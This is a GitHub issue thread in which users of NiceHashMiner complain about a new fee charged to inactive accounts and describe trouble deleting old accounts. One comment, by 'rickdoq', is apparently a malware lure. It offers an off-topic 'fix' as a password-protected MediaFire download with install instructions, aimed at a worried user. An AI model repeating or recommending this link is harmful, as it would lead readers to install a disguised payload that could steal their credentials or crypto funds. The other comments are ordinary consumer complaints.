### ISSUE TITLE
Forced Inactive Account Fee

### ISSUE THREAD

**Issue by 99991** [nicehash/NiceHashMiner#2958]
NiceHash recently made up a fee to take BTC from all inactive accounts. Of course, everyone is free to choose whether or not to do business with a company that decides to make up new fees at random.

### Mail introducing the new inactive account fee

![nicehash-mail](https://github.com/user-attachments/assets/430d7f93-b463-4914-8d1e-733b3869f61a)

### Screeenshot of fees

![fees](https://github.com/user-attachments/assets/fedc6f98-d269-4a92-948f-d8caa1a3487b)

**Comment by SkylerHertz133** [comment]
This is some of the scummiest behavior I've seen lol. 

I got an email about this yesterday. I don't even recall opening a NiceHash account (maybe I did at some point?). I'm worried they'll start charging me for an account I don't even have the login info for. It looks like they just take Bitcoin out of your account. I should be fine then hopefully?

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by EnragedN3wb** [comment]
> This is some of the scummiest behavior I've seen lol.
> 
> I got an email about this yesterday. I don't even recall opening a NiceHash account (maybe I did at some point?). I'm worried they'll start charging me for an account I don't even have the login info for. It looks like they just take Bitcoin out of your account. I should be fine then hopefully?

Same here, but I'm not worried in the least. I never signed up for a paid service & I never agreed to any terms for a paid service. If they close the account I can't access, good. If they drain it dry, I don't care. If they touch my bank account I'm reporting it as fraud.

They have every right to make their service a paid one, but you can't just flip a switch on a free service & start taking money from everyone who ever made an account... That's called a bait & switch, AKA Fraud.

**Comment by J22T** [comment]
This is what I've encountered up to this point. I made all of the attempts via forgot password to identify which email I was using at the time because I don't know. I created it years in the past and only for experimental reasons. If the email entered is a match, I would receive an email from NiceHash for the reset. I did this with my primary email and that primary email is the exact same email they THEY used to contact ME. The email from NiceHash came through successfully. I rest the password. I just do not have the 2FA. Because of Google Authenticator. I haven't used Google Authenticator for years. Seems like they're phishing for unnecessary information by rejecting the actual procedure to delete the account. I have responded promptly and professionally each time. The last screenshot is the literal response I receive from them every time I send them anything now. They already have the correct email. I have responded to them directly with THAT email that THEY contacted ME and which came through as approved because of the above password reset being successful. It only makes sense that this primary email IS the email.

![Screenshot from 2024-09-28 13-27-16](https://github.com/user-attachments/assets/7eed2e4b-5871-4595-80c3-278261351a7d)
![Screenshot from 2024-09-28 15-00-11](https://github.com/user-attachments/assets/50f88456-4e73-4160-b360-fa39204c7919)
![Screenshot from 2024-09-28 15-00-46](https://github.com/user-attachments/assets/8ac61879-ba66-4cb6-815b-ddfc16f980ce)
![Screenshot from 2024-09-28 15-01-16](https://github.com/user-attachments/assets/96c77367-7f34-4aa7-86a8-1305f0d2be18)
